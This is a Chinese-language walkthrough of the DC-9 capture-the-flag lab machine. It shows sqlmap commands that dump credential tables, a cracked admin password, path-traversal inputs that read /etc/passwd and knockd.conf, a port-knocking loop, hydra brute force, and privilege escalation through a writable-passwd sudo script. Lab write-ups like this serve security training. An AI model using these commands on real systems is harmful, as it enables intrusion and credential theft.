靶机DC-9 靶机|

犀渠玉剑良家子，白马金羁侠少年。这篇文章主要讲述靶机DC-9相关的知识，希望能为你提供帮助。

靶机下载地址：??https://www.five86.com/dc-9.html??
靶机设置为NAT模式，使用Nmap扫描网段
确定靶机IP地址

有80端口去访问下网站
发现display界面有用户信息

可以搜索界面去搜索用户名
搜索的时候要注意下，输一个就可以了 "first or last name"

随便试了个万能语句发现有sql注入

把抓的包导出，sqlmap跑post注入

sqlmap四连

sqlmap -r ./home/kali/Desktop/dc9 --dbs

sqlmap -r ./home/kali/Desktop/dc9 --tables -D users

sqlmap -r ./home/kali/Desktop/dc9 --columns -T UserDetails -D users

【靶机DC-9】
?

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "username,password" -T UserDetails -D users

由于登录处需要的是username，这里的跑参数注意下

竟然登不上，跑了下别的库，找到了admin密码

sqlmap -r ./home/kali/Desktop/dc9 --dump -C "Username,Password" -T Users -D Staff

md5解密，admin/transorbital1

admin登录成功

发现页面显示File does not exist 文件不存在
试下文件包含?file=../../../../etc/passwd

找不到啥东西了，试下ssh也登不上，ssh状态为filtered，一般是被防火墙过滤了
查了下是ssh开启了knockd，端口敲门
需要按照指定顺序敲击端口，如果敲击的端口和顺序正确，防火墙会更改策略对该访问ip放行，来达到访问效果
访问下knockd配置文件
?file=../../../../etc/knockd.conf

分别去敲击指定端口，ssh状态变成open

for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.74.133; done

然后使用之前跑出来的账号密码尝试登陆ssh
使用hydra进行测试，发现了三组账号

在janitor中发现了几个密码，加到我们的密码字典中

sudo -l发现test文件有root权限

切换到test目录看下，找下这个test.py

在/opt/devstuff目录下

脚本的作用就是将第一个文件的内容附加到另一个文件里面去
在etc/passwd文件里进行写入账号密码
运行脚本的时候最好切换到test目录下